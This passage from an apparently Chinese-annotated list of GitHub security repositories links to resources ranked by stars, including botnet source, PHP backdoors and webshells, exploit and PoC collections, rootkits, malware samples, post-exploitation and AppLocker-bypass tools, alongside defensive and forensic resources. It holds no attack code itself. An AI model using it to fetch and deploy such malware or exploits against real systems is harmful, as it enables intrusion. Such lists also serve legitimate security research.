Windows Exploitation resources, and shiny things. Inspired by awesom - [**2169**星][2m] [gbdev/awesome-gbdev](https://github.com/gbdev/awesome-gbdev) A curated list of Game Boy development resources such as tools, docs, emulators, related projects and open-source ROMs. - [**2163**星][1y] [C++] [maestron/botnets](https://github.com/maestron/botnets) This is a collection of #botnet source codes, unorganized. For EDUCATIONAL PURPOSES ONLY - [**2161**星][10m] [exakat/php-static-analysis-tools](https://github.com/exakat/php-static-analysis-tools) A reviewed list of useful PHP static analysis tools - [**2132**星][22d] [goq/telegram-list](https://github.com/goq/telegram-list) List of telegram groups, channels & bots // Список интересных групп, каналов и ботов телеграма // Список чатов для программистов - [**2118**星][3m] [yeahhub/hacking-security-ebooks](https://github.com/yeahhub/hacking-security-ebooks) Top 100 Hacking & Security E-Books (Free Download) - [**2116**星][1m] [infoslack/awesome-web-hacking](https://github.com/infoslack/awesome-web-hacking) A list of web application security - [**2078**星][2m] [edoverflow/bugbounty-cheatsheet](https://github.com/edoverflow/bugbounty-cheatsheet) A list of interesting payloads, tips and tricks for bug bounty hunters. - [**2067**星][12d] [tanprathan/mobileapp-pentest-cheatsheet](https://github.com/tanprathan/mobileapp-pentest-cheatsheet) The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - [**2066**星][1y] [bluscreenofjeff/red-team-infrastructure-wiki](https://github.com/bluscreenofjeff/red-team-infrastructure-wiki) Wiki to collect Red Team infrastructure hardening resources - [**2057**星][9m] [Shell] [foospidy/payloads](https://github.com/foospidy/payloads) web 攻击 Payload 集合 - [**2042**星][9d] [Java] [williamfiset/algorithms](https://github.com/williamfiset/algorithms) A collection of algorithms and data structures - [**2030**星][14d] [HTML] [gtfobins/gtfobins.github.io](https://github.com/gtfobins/gtfobins.github.io) Curated list of Unix binaries that can be exploited to bypass system security restrictions - [**2018**星][2m] [qazbnm456/awesome-cve-poc](https://github.com/qazbnm456/awesome-cve-poc) CVE PoC列表 - [**1990**星][2y] [dloss/python-pentest-tools](https://github.com/dloss/python-pentest-tools) 可用于渗透测试的Python工具收集 - [**1982**星][1y] [BitBake] [1n3/intruderpayloads](https://github.com/1n3/intruderpayloads) BurpSuite Intruder Payload收集 - [**1956**星][2m] [Py] [nixawk/pentest-wiki](https://github.com/nixawk/pentest-wiki) PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others. - [**1930**星][3m] [toolswatch/blackhat-arsenal-tools](https://github.com/toolswatch/blackhat-arsenal-tools) Black Hat 武器库 - [**1904**星][30d] [olivierlaflamme/cheatsheet-god](https://github.com/olivierlaflamme/cheatsheet-god) Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet - [**1870**星][11m] [PHP] [bartblaze/php-backdoors](https://github.com/bartblaze/php-backdoors) A collection of PHP backdoors. For educational or testing purposes only. - [**1845**星][3m] [djadmin/awesome-bug-bounty](https://github.com/djadmin/awesome-bug-bounty) A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups. - [**1831**星][1y] [CSS] [ctfs/write-ups-2015](https://github.com/ctfs/write-ups-2015) Wiki-like CTF write-ups repository, maintained by the community. 2015 - [**1787**星][4y] [caesar0301/awesome-pcaptools](https://github.com/caesar0301/awesome-pcaptools) 用于处理网络痕迹的工具收集 - [**1779**星][1m] [17mon/china_ip_list](https://github.com/17mon/china_ip_list) IPList for China by IPIP.NET - [**1771**星][12d] [onethawt/idaplugins-list](https://github.com/onethawt/idaplugins-list) IDA插件收集 - [**1760**星][1y] [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) Collection of the cheat sheets useful for pentesting - [**1752**星][1m] [ngalongc/bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference) Inspired by - [**1748**星][3m] [PHP] [orangetw/my-ctf-web-challenges](https://github.com/orangetw/my-ctf-web-challenges) Collection of CTF Web challenges I made - [**1748**星][4m] [tunz/js-vuln-db](https://github.com/tunz/js-vuln-db) A collection of JavaScript engine CVEs with PoCs - [**1739**星][2m] [sirredbeard/awesome-wsl](https://github.com/sirredbeard/awesome-wsl) Awesome list dedicated to Windows Subsystem for Linux - [**1716**星][4m] [R] [briatte/awesome-network-analysis](https://github.com/briatte/awesome-network-analysis) A curated list of awesome network analysis resources. - [**1663**星][2y] [Shell] [juude/droidreverse](https://github.com/juude/droidreverse) android 逆向工程工具集 - [**1652**星][10m] [tylerha97/awesome-reversing](https://github.com/tylerha97/awesome-reversing) A curated list of awesome reversing resources - [**1650**星][15d] [sarojaba/awesome-devblog](https://github.com/sarojaba/awesome-devblog) Awesome Devblog - [**1636**星][2y] [jhaddix/tbhm](https://github.com/jhaddix/tbhm) The Bug Hunters Methodology - [**1630**星][2m] [ivrodriguezca/re-ios-apps](https://github.com/ivrodriguezca/re-ios-apps) A completely free, open source and online course about Reverse Engineering iOS Applications. - [**1602**星][7m] [Py] [w1109790800/penetration](https://github.com/w1109790800/penetration) 渗透 超全面的渗透资料 - [**1585**星][7m] [Ruby] [brunofacca/zen-rails-security-checklist](https://github.com/brunofacca/zen-rails-security-checklist) Checklist of security precautions for Ruby on Rails applications. - [**1546**星][19d] [emijrp/awesome-awesome](https://github.com/emijrp/awesome-awesome) A curated list of awesome curated lists of many topics. - [**1534**星][6m] [snowming04/the-hacker-playbook-3-translation](https://github.com/snowming04/the-hacker-playbook-3-translation) 对 The Hacker Playbook 3 的翻译。 - [**1509**星][14d] [YARA] [cybermonitor/apt_cybercriminal_campagin_collections](https://github.com/cybermonitor/apt_cybercriminal_campagin_collections) APT & CyberCriminal Campaign Collection - [**1482**星][14d] [C] [sleuthkit/sleuthkit](https://github.com/sleuthkit/sleuthkit) a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. - [**1481**星][2m] [minimaxir/hacker-news-undocumented](https://github.com/minimaxir/hacker-news-undocumented) Some of the hidden norms about Hacker News not otherwise covered in the Guidelines and the FAQ. - [**1479**星][30d] [edoverflow/can-i-take-over-xyz](https://github.com/edoverflow/can-i-take-over-xyz) "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records. - [**1421**星][5m] [yadox666/the-hackers-hardware-toolkit](https://github.com/yadox666/the-hackers-hardware-toolkit) 用于Red Team、渗透、安全研究的最佳硬件产品集合 - [**1417**星][3m] [Go] [hellogcc/100-gdb-tips](https://github.com/hellogcc/100-gdb-tips) A collection of gdb tips. 100 maybe just mean many here. - [**1417**星][3m] [HTML] [owasp/top10](https://github.com/owasp/top10) Official OWASP Top 10 Document Repository - [**1392**星][4y] [PHP] [johntroony/php-webshells](https://github.com/johntroony/php-webshells) Common php webshells. Do not host the file(s) on your server! - [**1376**星][2m] [grrrdog/java-deserialization-cheat-sheet](https://github.com/grrrdog/java-deserialization-cheat-sheet) The cheat sheet about Java Deserialization vulnerabilities - [**1347**星][2y] [HTML] [daxeel/blockshell](https://github.com/daxeel/blockshell) 用于学习区块链技术概念的命令行工具, 例如 likechaining, mining,proof of work 等 - [**1332**星][3m] [jaredthecoder/awesome-vehicle-security](https://github.com/jaredthecoder/awesome-vehicle-security) A curated list of awesome resources, books, hardware, software, applications, people to follow, and more cool stuff about vehicle security, car hacking, and tinkering with the functionality of your car. - [**1305**星][1m] [nikitavoloboev/privacy-respecting](https://github.com/nikitavoloboev/privacy-respecting) PrivacyRespecting 服务和软件列表 - [**1290**星][11d] [Shell] [firehol/blocklist-ipsets](https://github.com/firehol/blocklist-ipsets) ipsets dynamically updated with firehol's update-ipsets.sh script - [**1290**星][11d] [Shell] [firehol/blocklist-ipsets](https://github.com/firehol/blocklist-ipsets) ipsets dynamically updated with firehol's update-ipsets.sh script - [**1287**星][9m] [michalmalik/linux-re-101](https://github.com/michalmalik/linux-re-101) Linux逆向资源收集 - [**1252**星][19d] [michalmalik/osx-re-101](https://github.com/michalmalik/osx-re-101) OSX/iOS逆向资源收集 - [**1242**星][1y] [Ruby] [eliotsykes/rails-security-checklist](https://github.com/eliotsykes/rails-security-checklist) This checklist is limited to Rails security precautions and there are many other aspects of running a Rails app that need to be secured - [**1223**星][5y] [cure53/xsschallengewiki](https://github.com/cure53/xsschallengewiki) Welcome to the XSS Challenge Wiki! - [**1223**星][5y] [cure53/xsschallengewiki](https://github.com/cure53/XSSChallengeWiki) Welcome to the XSS Challenge Wiki! - [**1222**星][25d] [dweinstein/awesome-frida](https://github.com/dweinstein/awesome-frida) frida 资源列表 - [**1215**星][8m] [riusksk/secbook](https://github.com/riusksk/secbook) 信息安全从业者书单推荐 - [**1207**星][8m] [joe-shenouda/awesome-cyber-skills](https://github.com/joe-shenouda/awesome-cyber-skills) A curated list of hacking environments where you can train your cyber skills legally and safely - [**1203**星][1y] [felixgr/secure-ios-app-dev](https://github.com/felixgr/secure-ios-app-dev) iOSApp 最常见漏洞收集 - [**1197**星][2m] [Py] [cujanovic/ssrf-testing](https://github.com/cujanovic/ssrf-testing) SSRF (Server Side Request Forgery) testing resources - [**1187**星][2y] [C] [mubix/post-exploitation](https://github.com/mubix/post-exploitation) post-exploitation工具收集 - [**1181**星][1m] [Py] [13o-bbr-bbq/machine_learning_security](https://github.com/13o-bbr-bbq/machine_learning_security) 机器学习与安全的几个Topic - [Security_and_MachineLearning](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Security_and_MachineLearning) 网络安全与机器学习课程 - [Vulnerabilities_of_ML](https://github.com/13o-bbr-bbq/machine_learning_security/blob/master/Vulnerabilities_of_ML/) 机器学习漏洞的汇总 - [Analytics](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Analytics) 使用k-means分析捕获的数据包 - [CNN_test](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/CNN_test) 生成针对CNN的adversarial样例 - [DeepExploit](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit) 使用机器学习的全自动化渗透测试 - [Generator](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Generator) 使用遗传算法和生成对抗网络,全自动生成大量用于Web应用程序评估的注入代码。 - [Recommender](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Recommender) 推荐用于检测Web应用程序漏洞的最佳注入代码。 - [Saivs](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Saivs) 发现Web应用程序中的漏洞的AI - [**1172**星][17d] [m4ll0k/awesome-hacking-tools](https://github.com/m4ll0k/awesome-hacking-tools) Awesome Hacking Tools - [**1164**星][14d] [w00t3k/awesome-cellular-hacking](https://github.com/w00t3k/awesome-cellular-hacking) Awesome-Cellular-Hacking - [**1155**星][3y] [PS] [powershellempire/powertools](https://github.com/powershellempire/powertools) PowerShell项目的集合,重点是进攻性操作 - [PewPewPew](https://github.com/powershellempire/powertools/tree/master/PewPewPew) scripts that utilize a common pattern to host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server, and then post-process any results. - [PowerBreach](https://github.com/powershellempire/powertools/tree/master/PowerBreach) a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system. - [PowerPick](https://github.com/powershellempire/powertools/tree/master/PowerPick) allowing the execution of Powershell functionality without the use of Powershell.exe - [**1145**星][1m] [Batchfile] [ckjbug/hacking](https://github.com/ckjbug/hacking) Collate and develop network security, Hackers technical documentation and tools, code. - [**1145**星][7m] [nebgnahz/awesome-iot-hacks](https://github.com/nebgnahz/awesome-iot-hacks) A Collection of Hacks in IoT Space so that we can address them (hopefully). - [**1143**星][2y] [Py] [hackathonhackers/personal-sites](https://github.com/hackathonhackers/personal-sites) List of Hackathon Hackers' personal sites. - [**1141**星][1m] [HTML] [securitytxt/security-txt](https://github.com/securitytxt/security-txt) 网站定义安全策略的“标准” - [**1116**星][21d] [slowmist/knowledge-base](https://github.com/slowmist/knowledge-base) Knowledge Base 慢雾安全团队知识库 - [**1115**星][1y] [paulsec/awesome-windows-domain-hardening](https://github.com/PaulSec/awesome-windows-domain-hardening) A curated list of awesome Security Hardening techniques for Windows. - [**1112**星][1y] [Py] [bugcrowd/hunt](https://github.com/bugcrowd/HUNT) Burp和ZAP的扩展收集 - [**1110**星][6m] [Py] [coffeehb/some-poc-or-exp](https://github.com/coffeehb/some-poc-or-exp) 各种漏洞poc、Exp的收集或编写 - [**1110**星][5m] [zbetcheckin/security_list](https://github.com/zbetcheckin/security_list) Great security list for fun and profit - [**1108**星][2m] [snoopysecurity/awesome-burp-extensions](https://github.com/snoopysecurity/awesome-burp-extensions) Burp扩展收集 - [**1080**星][2m] [guardrailsio/awesome-golang-security](https://github.com/guardrailsio/awesome-golang-security) Awesome Golang Security resources - [**1066**星][12d] [Py] [forseti-security/forseti-security](https://github.com/forseti-security/forseti-security) A community-driven collection of open source tools to improve the security of your Google Cloud Platform environments - [**1065**星][2y] [wtsxdev/machine-learning-for-cyber-security](https://github.com/wtsxdev/machine-learning-for-cyber-security) Curated list of tools and resources related to the use of machine learning for cyber security - [**1062**星][16d] [denji/awesome-http-benchmark](https://github.com/denji/awesome-http-benchmark) HTTP(S) benchmark tools, testing/debugging, & restAPI (RESTful) - [**1049**星][1m] [Py] [ct-open-source/tuya-convert](https://github.com/ct-open-source/tuya-convert) A collection of scripts to flash Tuya IoT devices to alternative firmwares - [**1037**星][2m] [C] [xairy/kernel-exploits](https://github.com/xairy/kernel-exploits) My proof-of-concept exploits for the Linux kernel - [**1030**星][1y] [naetw/ctf-pwn-tips](https://github.com/naetw/ctf-pwn-tips) Here record some tips about pwn. Something is obsoleted and won't be updated. Sorry about that. - [**1030**星][7m] [stephenturner/oneliners](https://github.com/stephenturner/oneliners) Useful bash one-liners for bioinformatics. - [**1026**星][17d] [sundowndev/hacker-roadmap](https://github.com/sundowndev/hacker-roadmap) an overview of what you need to learn penetration testing and a collection of hacking tools, resources and references to practice ethical hacking - [**1026**星][2y] [ObjC] [zhengmin1989/ios_ice_and_fire](https://github.com/zhengmin1989/ios_ice_and_fire) iOS冰与火之歌 - [**1020**星][2m] [C] [bt3gl/pentesting-toolkit](https://github.com/bt3gl/Pentesting-Toolkit) 渗透测试,CTF和战争游戏的工具收集 - [**1013**星][1y] [JS] [0xsobky/hackvault](https://github.com/0xsobky/hackvault) A container repository for my public web hacks! - [**1009**星][10m] [onethawt/reverseengineering-reading-list](https://github.com/onethawt/reverseengineering-reading-list) A list of Reverse Engineering articles, books, and papers - [**1007**星][1y] [PHP] [secwiki/cms-hunter](https://github.com/secwiki/cms-hunter) CMS漏洞测试用例集合 - [**993**星][19d] [Py] [jekil/awesome-hacking](https://github.com/jekil/awesome-hacking) Awesome hacking is an awesome collection of hacking tools. - [**990**星][11m] [Py] [xiphosresearch/exploits](https://github.com/xiphosresearch/exploits) Miscellaneous exploit code - [**986**星][8m] [0x4d31/awesome-threat-detection](https://github.com/0x4d31/awesome-threat-detection) A curated list of awesome threat detection and hunting resources - [**977**星][4m] [ctfs/resources](https://github.com/ctfs/resources) A general collection of information, tools, and tips regarding CTFs and similar security competitions - [**963**星][2y] [C] [fdiskyou/injectallthethings](https://github.com/fdiskyou/injectallthethings) Seven different DLL injection techniques in one single project. - [**959**星][5m] [bugcrowd/bugcrowd_university](https://github.com/bugcrowd/bugcrowd_university) 研究者社区的教育内容 - [**959**星][10m] [wtsxdev/penetration-testing](https://github.com/wtsxdev/penetration-testing) List of awesome penetration testing resources, tools and other shiny things - [**949**星][6m] [C] [dhavalkapil/heap-exploitation](https://github.com/dhavalkapil/heap-exploitation) This book on heap exploitation is a guide to understanding the internals of glibc's heap and various attacks possible on the heap structure. - [**946**星][2y] [HTML] [chybeta/software-security-learning](https://github.com/chybeta/software-security-learning) Software-Security-Learning - [**943**星][18d] [Py] [nullsecuritynet/tools](https://github.com/nullsecuritynet/tools) Security and Hacking Tools, Exploits, Proof of Concepts, Shellcodes, Scripts. - [**939**星][2y] [deepspaceharbor/awesome-ai-security](https://github.com/DeepSpaceHarbor/Awesome-AI-Security) A curated list of AI security resources - [**929**星][2m] [tom0li/collection-document](https://github.com/tom0li/collection-document) Collection of quality safety articles - [**923**星][9m] [C] [0x90/wifi-arsenal](https://github.com/0x90/wifi-arsenal) WiFi arsenal - [**921**星][7m] [PS] [api0cradle/ultimateapplockerbypasslist](https://github.com/api0cradle/ultimateapplockerbypasslist) The goal of this repository is to document the most common techniques to bypass AppLocker. - [**917**星][7m] [cn0xroot/rfsec-toolkit](https://github.com/cn0xroot/rfsec-toolkit) RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.无线通信协议相关的工具集,可借助SDR硬件+相关工具对无线通信进行研究。Collect with ♥ by HackSmith - [**906**星][1m] [Shell] [dominicbreuker/stego-toolkit](https://github.com/dominicbreuker/stego-toolkit) Collection of steganography tools - helps with CTF challenges - [**899**星][12d] [Py] [derekselander/lldb](https://github.com/derekselander/lldb) A collection of LLDB aliases/regexes and Python scripts to aid in your debugging sessions - [**898**星][2m] [HTML] [hookmaster/frida-all-in-one](https://github.com/hookmaster/frida-all-in-one) FRIDA操作手册 - [**894**星][3m] [Ruby] [w181496/web-ctf-cheatsheet](https://github.com/w181496/web-ctf-cheatsheet) Web CTF CheatSheet - [**890**星][3m] [jakejarvis/awesome-shodan-queries](https://github.com/jakejarvis/awesome-shodan-queries) Awesome Shodan Search Queries - [**871**星][12d] [explife0011/awesome-windows-kernel-security-development](https://github.com/explife0011/awesome-windows-kernel-security-development) windows kernel security development - [**852**星][30d] [trimstray/iptables-essentials](https://github.com/trimstray/iptables-essentials) Common Firewall Rules and Commands. - [**841**星][2m] [cugu/awesome-forensics](https://github.com/cugu/awesome-forensics) A curated list of awesome forensic analysis tools and resources - [**838**星][17d] [HTML] [rewardone/oscprepo](https://github.com/rewardone/oscprepo) A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmarks and reading material in 'BookmarkList' Keepnote. Reconscan in scripts folder. - [**836**星][15d] [v33ru/iotsecurity101](https://github.com/v33ru/iotsecurity101) From IoT Pentesting to IoT Security - [**829**星][4y] [PS] [clymb3r/powershell](https://github.com/clymb3r/powershell) Useful PowerShell scripts - [**829**星][5m] [Shell] [danielmiessler/robotsdisallowed](https://github.com/danielmiessler/robotsdisallowed) A curated list of the most common and most interesting robots.txt disallowed directories. - [**826**星][10d] [cveproject/cvelist](https://github.com/cveproject/cvelist) Pilot program for CVE submission through GitHub - [**823**星][3m] [feeicn/security-ppt](https://github.com/feeicn/security-ppt) 大安全各领域各公司各会议分享的PPT - [**822**星][3m] [Shell] [shr3ddersec/shr3dkit](https://github.com/shr3ddersec/shr3dkit) Red Team Tool Kit - [**813**星][3y] [Py] [scrapy/quotesbot](https://github.com/scrapy/quotesbot) This is a sample Scrapy project for educational purposes - [**805**星][3y] [shmilylty/awesome-hacking](https://github.com/shmilylty/awesome-hacking) awesome hacking chinese version - [**796**星][15d] [Shell] [aqzt/kjyw](https://github.com/aqzt/kjyw) 快捷运维,代号kjyw,项目基于shell、python,运维脚本工具库,收集各类运维常用工具脚本,实现快速安装nginx、mysql、php、redis、nagios、运维经常使用的脚本等等... - [**788**星][11m] [v2-dev/awesome-social-engineering](https://github.com/v2-dev/awesome-social-engineering) 社会工程学资源集合 - [**778**星][2y] [Py] [dagrz/aws_pwn](https://github.com/dagrz/aws_pwn) A collection of AWS penetration testing junk - [**766**星][2m] [daviddias/awesome-hacking-locations](https://github.com/daviddias/awesome-hacking-locations) List of Awesome Hacking Locations, organised by Country and City, listing if it features power and wifi. - [**761**星][1m] [Py] [mubix/shellshocker-pocs](https://github.com/mubix/shellshocker-pocs) Collection of Proof of Concepts and Potential Targets for #ShellShocker - [**760**星][3y] [masatokinugawa/filterbypass](https://github.com/masatokinugawa/filterbypass) 浏览器XSS 过滤绕过清单 - [**738**星][14d] [C++] [google/shaderc](https://github.com/google/shaderc) A collection of tools, libraries, and tests for Vulkan shader compilation. - [**737**星][7m] [Py] [devttys0/ida](https://github.com/devttys0/ida) IDA插件/脚本/模块收集 - [wpsearch](https://github.com/devttys0/ida/blob/master/scripts/wpsearch.py) 查找在MIPS WPS checksum实现中常见的立即数 - [md5hash](https://github.com/devttys0/ida/tree/master/modules/md5hash) 纯Python版的MD5 hash实现(IDA的hashlib有问题) - [alleycat](https://github.com/devttys0/ida/tree/master/plugins/alleycat) 查找向指定的函数内代码块的路径、查找两个或多个函数之间的路径、生成交互式调用图、可编程 - [codatify](https://github.com/devttys0/ida/tree/master/plugins/codatify) 定义IDA自动化分析时miss的ASCII字符串、函数、代码。将data段的所有未定义字节转换为DWORD(于是IDA可识别函数和跳转表指针) - [fluorescence](https://github.com/devttys0/ida/tree/master/plugins/fluorescence) 高亮函数调用指令 - [leafblower](https://github.com/devttys0/ida/tree/master/plugins/leafblower) 识别常用的POSIX函数:printf, sprintf, memcmp, strcpy等 - [localxrefs](https://github.com/devttys0/ida/tree/master/plugins/localxrefs) 在当前函数内部查找所有对任意选择文本的引用 - [mipslocalvars](https://github.com/devttys0/ida/tree/master/plugins/mipslocalvars) 对栈上只用于存储寄存器的变量进行命名,简化栈数据分析(MISP) - [mipsrop](https://github.com/devttys0/ida/tree/master/plugins/mipsrop) 在MIPS可执行代码中搜寻ROP。查找常见的ROP - [rizzo](https://github.com/devttys0/ida/tree/master/plugins/rizzo) 对2个或多个IDB之间的函数进行识别和重命名,基于:函数签名、对唯一字符串/常量的引用、模糊签名、调用图 - [**736**星][1y] [Py] [averagesecurityguy/scripts](https://github.com/averagesecurityguy/scripts) Scripts I use during pentest engagements. - [**733**星][5m] [Lua] [cldrn/nmap-nse-scripts](https://github.com/cldrn/nmap-nse-scripts) My collection of nmap NSE scripts - [**728**星][3m] [C#] [harleyqu1nn/aggressorscripts](https://github.com/harleyqu1nn/aggressorscripts) Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources - [**725**星][2m] [HTML] [j00ru/windows-syscalls](https://github.com/j00ru/windows-syscalls) Windows 系统调用表(NT/2000/XP/2003/Vista/2008/7/2012/8/10) - [**722**星][29d] [voorivex/pentest-guide](https://github.com/voorivex/pentest-guide) 基于OWASP的渗透测试指南,包括测试案例,资源和示例。 - [**714**星][1y] [snifer/security-cheatsheets](https://github.com/snifer/security-cheatsheets) A collection of cheatsheets for various infosec tools and topics. - [**713**星][6m] [leezj9671/pentest_interview](https://github.com/leezj9671/pentest_interview) 个人准备渗透测试和安全面试的经验之谈,和去部分厂商的面试题,干货真的满满~ - [**712**星][5m] [bit4woo/python_sec](https://github.com/bit4woo/python_sec) python安全和代码审计相关资料收集 - [**696**星][2m] [Py] [iceyhexman/onlinetools](https://github.com/iceyhexman/onlinetools) 在线cms识别|信息泄露|工控|系统|物联网安全|cms漏洞扫描|nmap端口扫描|子域名获取|待续.. - [**695**星][4m] [netflix/security-bulletins](https://github.com/netflix/security-bulletins) Security Bulletins that relate to Netflix Open Source - [**693**星][2y] [C] [1n3/privesc](https://github.com/1n3/privesc) A collection of Windows, Linux and MySQL privilege escalation scripts and exploits. - [**685**星][14d] [Py] [gwen001/pentest-tools](https://github.com/gwen001/pentest-tools) 日常使用的渗透工具集合 - [**684**星][2m] [andrewjkerr/security-cheatsheets](https://github.com/andrewjkerr/security-cheatsheets) A collection of useful cheatsheets for cheat that focuses on aiding security-type people with either security tools or popular UNIX programs. - [**682**星][3y] [PHP] [xl7dev/webshell](https://github.com/xl7dev/webshell) Webshell && Backdoor Collection - [**681**星][1m] [Shell] [wslutilities/wslu](https://github.com/wslutilities/wslu) A collection of utilities for Windows 10 Linux Subsystems - [**675**星][1y] [C] [billy-ellis/exploit-challenges](https://github.com/billy-ellis/exploit-challenges) A collection of vulnerable ARM binaries for practicing exploit development - [**668**星][2m] [doridori/android-security-reference](https://github.com/doridori/android-security-reference) A W.I.P Android Security Ref - [**665**星][2m] [redhuntlabs/awesome-asset-discovery](https://github.com/redhuntlabs/awesome-asset-discovery) List of Awesome Asset Discovery Resources - [**664**星][1y] [chybeta/code-audit-challenges](https://github.com/chybeta/code-audit-challenges) Code-Audit-Challenges - [**662**星][11d] [the-akira/computer-science-resources](https://github.com/the-akira/Computer-Science-Resources) A list of resources in different fields of Computer Science (multiple languages) - [**653**星][1m] [YARA] [eset/malware-ioc](https://github.com/eset/malware-ioc) Indicators of Compromises (IOC) of our various investigations - [**643**星][2y] [harmj0y/cheatsheets](https://github.com/harmj0y/cheatsheets) Cheat sheets for various projects. - [**643**星][6m] [PHP] [mattiasgeniar/php-exploit-scripts](https://github.com/mattiasgeniar/php-exploit-scripts) A collection of PHP exploit scripts, found when investigating hacked servers. These are stored for educational purposes and to test fuzzers and vulnerability scanners. Feel free to contribute. - [**639**星][9m] [cryptogenic/exploit-writeups](https://github.com/cryptogenic/exploit-writeups) A collection where my current and future writeups for exploits/CTF will go - [**638**星][12m] [HTML] [bl4de/security_whitepapers](https://github.com/bl4de/security_whitepapers) Collection of misc IT Security related whitepapers, presentations, slides - hacking, bug bounty, web application security, XSS, CSRF, SQLi - [**637**星][23d] [PS] [olafhartong/sysmon-modular](https://github.com/olafhartong/sysmon-modular) sysmon配置模块收集 - [**635**星][8m] [yeyintminthuhtut/awesome-advanced-windows-exploitation-references](https://github.com/yeyintminthuhtut/Awesome-Advanced-Windows-Exploitation-References) List of Awesome Advanced Windows Exploitation References - [**633**星][5m] [3gstudent/pentest-and-development-tips](https://github.com/3gstudent/pentest-and-development-tips) A collection of pentest and development tips - [**632**星][10m] [webbreacher/offensiveinterview](https://github.com/webbreacher/offensiveinterview) Interview questions to screen offensive (red team/pentest) candidates - [**629**星][4m] [bypass007/safety-project-collection](https://github.com/bypass007/safety-project-collection) 收集一些比较优秀的开源安全项目,以帮助甲方安全从业人员构建企业安全能力。 - [**620**星][2y] [turbo/openftp4](https://github.com/turbo/openftp4) A list of all FTP servers in IPv4 that allow anonymous logins. - [**619**星][1y] [jiangsir404/audit-learning](https://github.com/jiangsir404/audit-learning) 记录自己对《代码审计》的理解和总结,对危险函数的深入分析以及在p牛的博客和代码审计圈的收获 - [**618**星][22d] [404notf0und/ai-for-security-learning](https://github.com/404notf0und/ai-for-security-learning) 安全场景、基于AI的安全算法和安全数据分析学习资料整理 - [**613**星][4m] [Shell] [ashishb/osx-and-ios-security-awesome](https://github.com/ashishb/osx-and-ios-security-awesome) OSX and iOS related security tools - [**608**星][3m] [Swift] [gradients/gradients](https://github.com/Gradients/Gradients) A curated collection of 180 splendid gradients made in swift - [**606**星][1y] [C] [scottybauer/android_kernel_cve_pocs](https://github.com/scottybauer/android_kernel_cve_pocs) A list of my CVE's with POCs - [**604**星][2m] [siguza/ios-resources](https://github.com/siguza/ios-resources) Useful resources for iOS hacking - [**601**星][2m] [Py] [hslatman/awesome-industrial-control-system-security](https://github.com/hslatman/awesome-industrial-control-system-security) 工控系统安全资源列表 - [**600**星][6m] [fabrimagic72/malware-samples](https://github.com/fabrimagic72/malware-samples) 恶意软件样本 - [**593**星][1m] [lirantal/awesome-nodejs-security](https://github.com/lirantal/awesome-nodejs-security) Awesome Node.js Security resources - [**593**星][2m] [PS] [threatexpress/red-team-scripts](https://github.com/threatexpress/red-team-scripts) A collection of Red Team focused tools, scripts, and notes - [**592**星][3y] [hack-with-github/windows](https://github.com/hack-with-github/windows) Awesome tools to exploit Windows ! - [**592**星][12m] [pandazheng/ioshackstudy](https://github.com/pandazheng/ioshackstudy) IOS安全学习资料汇总 - [**591**星][16d] [Perl] [bollwarm/sectoolset](https://github.com/bollwarm/sectoolset) 安全项目工具集合 - [**591**星][1y] [brunty/awesome-checker-services](https://github.com/brunty/awesome-checker-services) List of links to the various checkers out there on the web for sites, domains, security etc - [**590**星][15d] [clarketm/proxy-list](https://github.com/clarketm/proxy-list) A list of free, public, forward proxy servers. UPDATED DAILY! - [**587**星][6m] [d30sa1/rootkits-list-download](https://github.com/d30sa1/rootkits-list-download) Rootkit收集 - [**577**星][2y] [hack-with-github/awesome-security-gists](https://github.com/hack-with-github/awesome-security-gists) Gist收集 - [**574**星][3m] [HTML] [gwillem/magento-malware-scanner](https://github.com/gwillem/magento-malware-scanner) 用于检测 Magento 恶意软件的规则/样本集合 - [**573**星][2y] [Py] [nnamon/linux-exploitation-course](https://github.com/nnamon/linux-exploitation-course) 中级 Linux 漏洞开发课程 - [**571**星][4m] [r35tart/penetration_testing_case](https://github.com/r35tart/penetration_testing_case) 用于记录分享一些有趣的案例 - [**564**星][1y] [C] [externalist/exploit_playground](https://github.com/externalist/exploit_playground) Analysis of public exploits or my 1day exploits - [**564**星][3m] [HTML] [netspi/sqlinjectionwiki](https://github.com/netspi/sqlinjectionwiki) A wiki focusing on aggregating and documenting various SQL injection methods - [**564**星][11m] [rapid7/ssh-badkeys](https://github.com/rapid7/ssh-badkeys) A collection of static SSH keys (public and private) that have made their way into software and hardware products. - [**560**星][9m] [guardrailsio/awesome-python-security](https://github.com/guardrailsio/awesome-python-security) Awesome Python Security resources - [**558**星][10m] [guardrailsio/awesome-php-security](https://github.com/guardrailsio/awesome-php-security) Awesome PHP Security Resources - [**557**星][3y] [secmobi/wiki.secmobi.com](https://github.com/secmobi/wiki.secmobi.com) 手机安全资源收集 - [**557**星][9m] [Py] [yellowbyte/reverse-engineering-reference-manual](https://github.com/yellowbyte/reverse-engineering-reference-manual) 逆向参考手册. 包括很多工具的使用Tips - [**550**星][4y] [miyogurt/network-security-mind-map](https://github.com/MiYogurt/network-security-mind-map) 网络安全基础知识思维导图 - [**549**星][4m] [C] [espressif/esp-iot-solution](https://github.com/espressif/esp-iot-solution) Espressif IoT Library. IoT Device Drivers, Documentations And Solutions. - [**530**星][30d] [a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) Linux内核防御地图 - [**530**星][2y] [Py] 